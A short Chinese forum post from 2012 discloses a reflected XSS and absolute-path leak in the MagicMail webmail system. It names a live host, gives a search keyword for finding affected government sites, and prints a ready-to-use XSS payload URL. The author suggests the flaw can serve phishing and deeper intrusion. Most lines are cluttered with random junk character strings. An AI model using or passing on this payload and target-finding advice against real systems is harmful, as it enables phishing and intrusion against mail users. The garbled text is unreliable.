今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
* z) C: k# Y/ b4 C" q; w: ^' J u5 A6 H
9 h: _5 n9 q/ P9 c: w2 K+ Z包含 一个反射性XSS 以及 绝对路径泄漏
6 n9 G# y! j7 _$ M/ D看了看 貌似全部是linux的。
; r! l9 u) k0 _9 u
) W: O- n( D1 r9 O* G i5 U关键字:迈捷邮件系统 by MagicMail
8 P* D1 k: k9 C! g6 p! P) o: I
; Z, i% k) s$ Q5 w0 r可以看到很多政府网站都用这个邮件系统+ H0 {" J5 B+ {: m
2 \) ~0 V+ n; `! B5 A: p绝对路径 http://madman.in/index.php?login_type=declare&language=
) d: P; D9 R3 V8 b: z5 @5 R) q! ?+ |$ a7 t5 f( L
8 o2 ?- t! U4 J x
+ I; \3 W. c! Y: b2 oXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
. D! k2 b: O9 }
7 P" P M! y- ^, N( d2 X4 L/ j2 J7 k* m& a4 Y! j5 ?$ ~$ T0 H
) i. i7 h; ~( p4 r/ U6 \ Z# E虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等5 d& V* S1 N" U3 H
5 J5 a* r6 B8 |! C
修复方案:看官方补丁吧。
, Z) J$ F$ _; T3 Y* e! I |
发表于 2012-11-9 20:38:41
收藏
支持
反对